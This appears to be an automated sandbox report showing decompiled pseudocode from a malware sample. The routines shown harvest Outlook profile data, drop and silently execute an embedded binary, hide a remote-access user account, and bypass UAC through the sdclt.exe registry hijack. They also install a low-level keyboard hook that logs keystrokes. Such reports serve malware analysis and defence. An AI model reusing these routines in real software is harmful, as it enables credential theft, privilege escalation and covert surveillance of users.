                                      • Opcode Fuzzy Hash: d8a433de6b6426e13d78070eda398d663bec40e3adb73af1f71e2b8eae7b89cf
                                      • Instruction Fuzzy Hash: 1C71A176604300ABD710DF65DC45E6BB7E8FF8E704F01492EF65893291DA78E904CB6A
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      C-Code - Quality: 85%
                                      			E00438D7E(intOrPtr __ecx, void* __edx, void* __eflags) {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				intOrPtr _v20;
                                      				short _v4116;
                                      				short _v8212;
                                      				short _v12308;
                                      				long _t68;
                                      				int _t74;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				short* _t80;
                                      
                                      				_t76 = __edx;
                                      				_t75 = __ecx;
                                      				E00431130(0x3014, __ecx);
                                      				_v20 = _t75;
                                      				_t74 = 0;
                                      				E00431052( &_v4116, 0, 0x800);
                                      				E00431052( &_v8212, 0, 0x800);
                                      				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
                                      					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                      					if(__eflags != 0) {
                                      						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                      						if(__eflags != 0) {
                                      							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
                                      							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
                                      							if(__eflags != 0) {
                                      								L15:
                                      								__eflags = 0;
                                      								return 0;
                                      							}
                                      							_push(_t80);
                                      							L8:
                                      							lstrcpyW( &_v4116, ??);
                                      							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
                                      								goto L15;
                                      							}
                                      							if(_v16 <= _t74) {
                                      								L14:
                                      								return 1;
                                      							} else {
                                      								goto L10;
                                      							}
                                      							while(1) {
                                      								L10:
                                      								_v12 = 0x800;
                                      								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
                                      									goto L15;
                                      								}
                                      								RegCloseKey(_v8);
                                      								lstrcpyW( &_v8212,  &_v4116);
                                      								lstrcatW( &_v8212, "\\");
                                      								lstrcatW( &_v8212,  &_v12308);
                                      								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
                                      								_t90 = _t68;
                                      								if(_t68 != 0) {
                                      									goto L15;
                                      								}
                                      								_push(_t75);
                                      								_t75 = _v20;
                                      								E00438F40(_t75, _t76, _t90, _v8);
                                      								RegCloseKey(_v8);
                                      								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
                                      									goto L15;
                                      								}
                                      								_t74 = _t74 + 1;
                                      								if(_t74 < _v16) {
                                      									continue;
                                      								}
                                      								goto L14;
                                      							}
                                      							goto L15;
                                      						}
                                      						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
                                      						goto L8;
                                      					}
                                      					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                      					goto L8;
                                      				}
                                      				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                      				goto L8;
                                      			}

                                      Instruction addresses (one per decompiled statement):
                                      0x00438d7e 0x00438d7e 0x00438d86 0x00438d93 0x00438d97 0x00438da1 0x00438db2 0x00438dd9
                                      0x00438df4 0x00438df6 0x00438e11 0x00438e13 0x00438e22 0x00438e2f 0x00438e31 0x00438f39
                                      0x00438f39 0x00000000 0x00438f39 0x00438e37 0x00438e38 0x00438e45 0x00438e63 0x00000000
                                      0x00000000 0x00438e6c 0x00438f34 0x00000000 0x00000000 0x00000000 0x00000000 0x00438e72
                                      0x00438e72 0x00438e74 0x00438e96 0x00000000 0x00000000 0x00438e9f 0x00438eb3 0x00438ec1
                                      0x00438ed5 0x00438ef2 0x00438ef4 0x00438ef6 0x00000000 0x00000000 0x00438ef8 0x00438efc
                                      0x00438eff 0x00438f07 0x00438f28 0x00000000 0x00000000 0x00438f2a 0x00438f2e 0x00000000
                                      0x00000000 0x00000000 0x00438f2e 0x00000000 0x00438e72 0x00438e15 0x00000000 0x00438e15
                                      0x00438df8 0x00000000 0x00438df8 0x00438ddb 0x00000000

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00438DD5
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00438DF2
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00438E45
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00438E5B
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00438E8E
                                      • RegCloseKey.ADVAPI32(?), ref: 00438E9F
                                      • lstrcpyW.KERNEL32(?,?), ref: 00438EB3
                                      • lstrcatW.KERNEL32(?,00442644), ref: 00438EC1
                                      • lstrcatW.KERNEL32(?,?), ref: 00438ED5
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00438EF2
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00438F07
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00438F24
                                      Strings
                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438E05, 00438E15
                                      • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438DCB
                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438DE8, 00438DF8
                                      • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438E22, 00438E27, 00438E37
                                      • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00438DDB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                      • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                      • API String ID: 1891545080-2020977430
                                      • Opcode ID: 10286faae152fdc18d70abeccbf13f4ef0cd44cf323084bc2bab2abe3dc97d99
                                      • Instruction ID: 00f002cab1f65c7af10e74a72e75010e38f9406cadef468b3b38251ec679610f
                                      • Opcode Fuzzy Hash: 10286faae152fdc18d70abeccbf13f4ef0cd44cf323084bc2bab2abe3dc97d99
                                      • Instruction Fuzzy Hash: 09412FB190021DBEEB20DBA1CC45EFFB76CEB19784F1004AAB615E2111EAB49E44DB74
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 85%
                                      			E00440E40(void* __ecx, void* __eflags, long _a4) {
                                      				intOrPtr* _v8;
                                      				long _v12;
                                      				struct _SHELLEXECUTEINFOA _v72;
                                      				char _v1096;
                                      				char _v2120;
                                      				char _v3144;
                                      				void* _t37;
                                      				void* _t39;
                                      				struct HRSRC__* _t80;
                                      				void* _t83;
                                      
                                      				_t75 =  *_a4;
                                      				_t67 = __ecx + 4;
                                      				_v8 = __ecx + 4;
                                      				E00433264(_t67, E0043FC1E( &_a4,  *_a4 + 4,  *_t75));
                                      				E00435A2D(_a4);
                                      				_t80 = FindResourceW(0, 0x67, L"WM_FIND");
                                      				_t37 = LoadResource(0, _t80);
                                      				_a4 = SizeofResource(0, _t80);
                                      				_t39 = LockResource(_t37);
                                      				E00431052( &_v1096, 0, 0x400);
                                      				E00431052( &_v2120, 0, 0x400);
                                      				GetTempPathA(0x400,  &_v1096);
                                      				lstrcatA( &_v1096, "find.exe");
                                      				GetTempPathA(0x400,  &_v2120);
                                      				lstrcatA( &_v2120, "find.db");
                                      				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                      				WriteFile(_t83, _t39, _a4,  &_v12, 0);
                                      				CloseHandle(_t83);
                                      				E00431052( &_v3144, 0, 0x400);
                                      				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                      				_v72.cbSize = 0x3c;
                                      				_v72.lpFile =  &_v1096;
                                      				_v72.fMask = 0x40;
                                      				asm("xorps xmm0, xmm0");
                                      				_v72.lpParameters =  &_v3144;
                                      				asm("movlpd [ebp-0x20], xmm0");
                                      				asm("movlpd [ebp-0x18], xmm0");
                                      				asm("movlpd [ebp-0x10], xmm0");
                                      				_v72.hwnd = 0;
                                      				_v72.lpVerb = 0;
                                      				_v72.lpDirectory = 0;
                                      				_v72.nShow = 0;
                                      				_v72.hInstApp = 0;
                                      				return ShellExecuteExA( &_v72);
                                      			}

                                      Instruction addresses (one per decompiled statement):
                                      0x00440e4f 0x00440e51 0x00440e57 0x00440e68 0x00440e70 0x00440e85 0x00440e89 0x00440e9a
                                      0x00440e9d 0x00440eb4 0x00440ec3 0x00440ed9 0x00440eed 0x00440efb 0x00440f09 0x00440f2b
                                      0x00440f36 0x00440f3d 0x00440f50 0x00440f6d 0x00440f79 0x00440f80 0x00440f8c 0x00440f93
                                      0x00440f96 0x00440f9c 0x00440fa2 0x00440fa7 0x00440fac 0x00440faf 0x00440fb2 0x00440fb5
                                      0x00440fb8 0x00440fc5

                                      APIs
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • FindResourceW.KERNEL32(00000000,00000067,WM_FIND), ref: 00440E7F
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00440E89
                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00440E93
                                      • LockResource.KERNEL32(00000000), ref: 00440E9D
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00440ED9
                                      • lstrcatA.KERNEL32(?,find.exe), ref: 00440EED
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00440EFB
                                      • lstrcatA.KERNEL32(?,find.db), ref: 00440F09
                                      • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00440F24
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00440F36
                                      • CloseHandle.KERNEL32(00000000), ref: 00440F3D
                                      • wsprintfA.USER32 ref: 00440F6D
                                      • ShellExecuteExA.SHELL32(0000003C), ref: 00440FBB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                      • String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
                                      • API String ID: 2851928664-3107137372
                                      • Opcode ID: 7ba1ad1331888ea7f12c1e4c8410f0aaca85bfa95c92e221241c1346cf070c9d
                                      • Instruction ID: 7276a63306b66a70d10eb096618c09a6ccb0429c592a28c99f1593bba1d065c4
                                      • Opcode Fuzzy Hash: 7ba1ad1331888ea7f12c1e4c8410f0aaca85bfa95c92e221241c1346cf070c9d
                                      • Instruction Fuzzy Hash: 20414CB590021CABDB10DBA1DD85FDEBBBCFF89304F1041A6F609A3150DAB45A458FA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043C67E(void* __edx, char _a4, char _a8) {
                                      				void* _v12;
                                      				char _v16;
                                      				int _v20;
                                      				char _v36;
                                      				void _v44;
                                      				void* _t51;
                                      				int _t56;
                                      				int _t70;
                                      				void* _t104;
                                      				signed int _t115;
                                      				void* _t161;
                                      				void* _t162;
                                      				void* _t163;
                                      				int _t172;
                                      
                                      				_t161 = __edx;
                                      				InitializeCriticalSection( &_v44);
                                      				_t115 = 6;
                                      				DeleteCriticalSection(memcpy(0x447cd8,  &_v44, _t115 << 2));
                                      				EnterCriticalSection(0x447cd8);
                                      				_t167 = _a4;
                                      				_t111 = _a8;
                                      				 *0x447d38 = _a4;
                                      				 *0x447d2c = 0x446cb8;
                                      				 *0x447d28 = _a8;
                                      				if(E0043C1A0(_t161) == 0) {
                                      					_t51 = E0043D4B8();
                                      					__eflags = _t51 - 6;
                                      					if(_t51 < 6) {
                                      						L14:
                                      						E00434B53(_t167, E004347F1( &_v36, 2, 0x447d30, 0x447d34));
                                      						E004347CE( &_v36);
                                      						LeaveCriticalSection(0x447cd8);
                                      						__eflags = 0;
                                      						return 0;
                                      					}
                                      					_t56 = E0043D469();
                                      					__eflags = _t56;
                                      					if(_t56 != 0) {
                                      						goto L14;
                                      					}
                                      					__eflags = E0043DB97() - 1;
                                      					if(__eflags == 0) {
                                      						_t162 = 8;
                                      						E00433264(0x447d30, E004332D4( &_a4, _t162, __eflags));
                                      						E00435A2D(_a4);
                                      						_t163 = 8;
                                      						E00433264(0x447d34, E004332D4( &_a4, _t163, __eflags));
                                      						E00435A2D(_a4);
                                      						_t172 = 0;
                                      						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
                                      						_v16 = 0;
                                      						RegSetValueExW(_v12,  *0x447d30, 0, 4,  &_v16, 4);
                                      						RegCloseKey(_v12);
                                      						_t70 = E0043B799(0x447d30, 0x447d34);
                                      						__eflags = _t70;
                                      						if(_t70 != 0) {
                                      							E0043F462(_a8, _t163, E00433412( &_a4, L"rudp"), 0x447d30);
                                      							E00435A2D(_a4);
                                      							E0043F462(_a8, _t163, E00433412( &_a8, L"rpdp"), 0x447d34);
                                      							E00435A2D(_a8);
                                      							E00431E6F(0x447cf0, E0043C57C, 0x447cd8);
                                      							LeaveCriticalSection(0x447cd8);
                                      							return 1;
                                      						}
                                      						E00434B53(_t167, E004347F1( &_v36, 9, 0x447d30, 0x447d34));
                                      						E004347CE( &_v36);
                                      						L12:
                                      						LeaveCriticalSection(0x447cd8);
                                      						return _t172;
                                      					}
                                      					E00434B53(_t167, E004347F1( &_v36, 1, 0x447d30, 0x447d34));
                                      					E004347CE( &_v36);
                                      					_t172 = 0;
                                      					goto L12;
                                      				}
                                      				E00433264(0x447d30, E0043F495(_t111, _t161,  &_a8, E00433412( &_a4, L"rudp")));
                                      				E00435A2D(_a8);
                                      				_a8 = 0;
                                      				E00435A2D(_a4);
                                      				E00433264(0x447d34, E0043F495(_t111, _t161,  &_a8, E00433412( &_a4, L"rpdp")));
                                      				E00435A2D(_a8);
                                      				_a8 = 0;
                                      				E00435A2D(_a4);
                                      				if(E0043308E(0x447d30) != 0 || E0043308E(0x447d34) != 0) {
                                      					E00434B53(_t167, E004347F1( &_v36, 8, 0x447d30, 0x447d34));
                                      					E004347CE( &_v36);
                                      				} else {
                                      					_t104 = E00433412( &_a4, 0x442608);
                                      					E00434B53(_t167, E004347F1( &_v36, 8, E00433412( &_a8, 0x442608), _t104));
                                      					E004347CE( &_v36);
                                      					E00435A2D(_a8);
                                      					_a8 = 0;
                                      					E00435A2D(_a4);
                                      				}
                                      				_t172 = 1;
                                      				goto L12;
                                      			}

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0043C68B
                                      • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0043C6A2
                                      • EnterCriticalSection.KERNEL32(00447CD8,?,?), ref: 0043C6AE
                                        • Part of subcall function 0043C1A0: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00447CD8,?,?,0043C6D5,?,?), ref: 0043C1D2
                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0043C883
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0043C89E
                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 0043C8A7
                                      • LeaveCriticalSection.KERNEL32(00447CD8,00000000,00447D30,00447D34,?,?), ref: 0043C8E2
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      • LeaveCriticalSection.KERNEL32(00447CD8,00000000,rpdp,00447D34,00000000,rudp,00447D30,00447D30,00447D34,?,?), ref: 0043C948
                                      • LeaveCriticalSection.KERNEL32(00447CD8,00000000,?,?), ref: 0043C978
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                      • String ID: 0}D$0}D$0}D$4}D$4}D$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                      • API String ID: 2046459734-753590845
                                      • Opcode ID: 12d2c47f58fff7b235118189204d94ecae2e8c2b279051d20560e012642d4eef
                                      • Instruction ID: 556f5f83cea60d274d85d864d4cd931a9eb990304c5d68c3c3d05cbc89ecc106
                                      • Opcode Fuzzy Hash: 12d2c47f58fff7b235118189204d94ecae2e8c2b279051d20560e012642d4eef
                                      • Instruction Fuzzy Hash: D17194B06101146ADB04FF61CC86AEE7769AF5C714F10A42FB905A6192DF7C6E06CBAC
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 84%
                                      			E0043F8C0(void* __edx, void* __eflags) {
                                      				void* _v8;
                                      				char _v12;
                                      				struct _SHELLEXECUTEINFOW _v72;
                                      				short _v592;
                                      				char _v1616;
                                      				short* _t52;
                                      
                                      				if(E0043DB97() != 1) {
                                      					_v8 = 0;
                                      					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
                                      					if(_v8 != 0) {
                                      						_t46 =  &_v12;
                                      						E0043D5DB( &_v12);
                                      					}
                                      					E0043F6C1();
                                      					E00431052( &_v1616, 0, 0x400);
                                      					GetModuleFileNameA(0,  &_v1616, 0x400);
                                      					E0043F65C(_t46, 0x444713,  &_v1616);
                                      					E0043F65C(_t46, "DelegateExecute", 0x444713);
                                      					GetSystemDirectoryW( &_v592, 0x104);
                                      					lstrcatW( &_v592, L"\\sdclt.exe");
                                      					_t52 = L"open";
                                      					ShellExecuteW(0, _t52,  &_v592, 0, 0, 1);
                                      					asm("movaps xmm0, [0x4449b0]");
                                      					_v72.lpFile =  &_v592;
                                      					_v72.cbSize = 0x3c;
                                      					_v72.fMask = 0x40;
                                      					_v72.hwnd = 0;
                                      					_v72.lpVerb = _t52;
                                      					asm("movups [ebp-0x30], xmm0");
                                      					ShellExecuteExW( &_v72);
                                      					TerminateProcess(_v72.hProcess, 0);
                                      					if(_v8 != 0) {
                                      						E0043D5B4( &_v12);
                                      					}
                                      					Sleep(0x7d0);
                                      					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
                                      					ExitProcess(0);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0043F8E2
                                      • IsWow64Process.KERNEL32(00000000), ref: 0043F8E9
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0043F920
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0043F952
                                      • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0043F964
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0043F97C
                                      • ShellExecuteExW.SHELL32(?), ref: 0043F9AE
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043F9B8
                                      • Sleep.KERNEL32(000007D0), ref: 0043F9D0
                                      • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0043F9E0
                                      • ExitProcess.KERNEL32 ref: 0043F9E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExecuteShellToken$CloseDeleteDirectoryExitFileHandleInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                      • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                      • API String ID: 194334098-2081737068
                                      • Opcode ID: e86374f955405f39f64225bd22bf9a23f7ef55c8838d3f686a9c2fd004c19734
                                      • Instruction ID: 6b8f5aa0efeaf161e369085ad33c8f4cf6a0f575acf8d49af3b2dd801ea18f29
                                      • Opcode Fuzzy Hash: e86374f955405f39f64225bd22bf9a23f7ef55c8838d3f686a9c2fd004c19734
                                      • Instruction Fuzzy Hash: 6C3184B5C01118BBDB10EBA5ED49EDEBBBCEF8A305F500066F509E2150D7B85A45CB68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 71%
                                      			E004374B4(void* __edx, void* __eflags) {
                                      				short _v176;
                                      				struct tagMSG _v204;
                                      				void* _v208;
                                      				struct _SYSTEMTIME _v228;
                                      				struct HINSTANCE__* _t19;
                                      				intOrPtr _t22;
                                      				intOrPtr _t25;
                                      				intOrPtr _t27;
                                      				intOrPtr _t40;
                                      				intOrPtr _t45;
                                      				void* _t46;
                                      				void* _t49;
                                      				intOrPtr* _t50;
                                      				void* _t59;
                                      				struct HINSTANCE__* _t60;
                                      				intOrPtr _t62;
                                      				intOrPtr _t64;
                                      				intOrPtr _t66;
                                      				void* _t68;
                                      				void* _t71;
                                      				void* _t75;
                                      				void* _t79;
                                      				void* _t90;
                                      
                                      				_t90 = __eflags;
                                      				_t71 = __edx;
                                      				_t19 = GetModuleHandleA(0);
                                      				_t62 =  *0x446690; // 0x0
                                      				_t60 = _t19;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				E00431052(_t62 + 0x210, 0, 0x800);
                                      				_t22 =  *0x446690; // 0x0
                                      				E00431052(_t22 + 0x10, 0, 0x208);
                                      				_t25 =  *0x446690; // 0x0
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
                                      				_t27 =  *0x446690; // 0x0
                                      				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
                                      				GetLocalTime( &_v228);
                                      				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
                                      				_t40 =  *0x446690; // 0x0
                                      				lstrcatW(_t40 + 0x10,  &_v176);
                                      				_t64 =  *0x446690; // 0x0
                                      				_t11 = _t64 + 0x10; // 0x10
                                      				E0043312C(_t64 + 0xc, _t71, _t11);
                                      				_t45 =  *0x446690; // 0x0
                                      				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                      				_t66 =  *0x446690; // 0x0
                                      				 *(_t66 + 4) = _t46;
                                      				CloseHandle(_t46);
                                      				_v228.wYear = 0;
                                      				_t68 = E0043FC79("c:\\windows\\system32\\user32.dll",  &_v228);
                                      				_t49 = E0043E970(_t68, 0, _t90);
                                      				_t91 = _t49;
                                      				if(_t49 == 0) {
                                      					_t50 =  *0x44668c; // 0x0
                                      				} else {
                                      					_push(_t68);
                                      					_t50 = E0043E907(_t49, "SetWindowsHookExA", _t91);
                                      					 *0x44668c = _t50;
                                      				}
                                      				 *_t50(0xd, E00437645, _t60, 0);
                                      				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
                                      					TranslateMessage( &_v204);
                                      					DispatchMessageA( &_v204);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004374C5
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00437519
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00437533
                                      • GetLocalTime.KERNEL32(?), ref: 0043753A
                                      • wsprintfW.USER32 ref: 0043756E
                                      • lstrcatW.KERNEL32(-00000010,?), ref: 00437585
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 004375B1
                                      • CloseHandle.KERNEL32(00000000), ref: 004375C1
                                        • Part of subcall function 0043FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
                                        • Part of subcall function 0043FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00432B6F), ref: 0043FCB1
                                        • Part of subcall function 0043FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
                                        • Part of subcall function 0043FC79: CloseHandle.KERNEL32(00000000), ref: 0043FCC9
                                        • Part of subcall function 0043E970: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,757C68BC,00000000,?,?,?,?,004375E2), ref: 0043E99C
